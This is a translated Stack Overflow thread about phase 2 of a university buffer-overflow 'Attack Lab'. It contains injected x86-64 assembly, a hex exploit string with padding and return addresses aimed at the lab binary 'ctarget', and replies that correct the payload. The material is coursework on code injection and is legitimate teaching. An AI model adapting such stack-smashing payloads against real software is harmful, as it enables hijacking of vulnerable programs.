我有一个缓冲区溢出实验室,我必须为一个名为The Attack Lab的项目做。我在实验室的第二阶段,为了让程序指向函数touch2()的地址,我必须将代码作为我的利用字符串的一部分注入。我已经达到了这样的程度,输出说这是阶段2的有效解决方案,但是然后它又说我导致了seg错误,然后又说我阶段失败了。
这是我收到的错误消息
cookie: 0x2d6fc2d5
Type string:Touch2!: You called touch2(0x2d6fc2d5)
valid solution for level 2 with target ctarget
ouch! You caused a segmentation fault!
better luck next time
FAILED这是我在汇编中使用的代码
mov1 $0x2d6fc2d5, %rdi
retq这是我传递到程序中的内容
48 c7 c7 d5 c2 6f 2d c3 #bytecode of exploit code
00 00 00 00 00 00 00 00 #padding of 0x38, amount needed to overwrite ret address
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
68 bd 66 55 00 00 00 00 #address of rsp - 0x38
0d 18 40 00 00 00 00 00 #address of touch2()我已经看了网上的教程,并为此工作了几个小时,但我还没有找到解决方案,我也不确定是什么导致了这个问题。它说解决方案是有效的,但随后seg出错并失败。任何帮助都将非常感谢,如果有什么需要澄清的,请告诉我!
发布于 2018-11-23 22:19:20
看起来攻击实验室最近进行了调整。应避免覆盖堆栈中返回地址的下一部分
相反,您可以使用push指令将值添加到堆栈。尝试从输入中删除touch2地址,并使用以下代码。
mov $0x2d6fc2d5, %rdi
pushq $0x40180d
ret发布于 2018-11-12 12:56:41
打印“有效解决方案”行相当于运行未经授权的代码,所以我相信您已经克服了挑战,而不管seg错误。
我想你的填充物太多了。缓冲区可能有24个字符,你有6行缓冲区,所以我猜你是在跳过rsp,跳到无效的地方,导致了一个段错误。
https://stackoverflow.com/questions/53255874
复制相似问题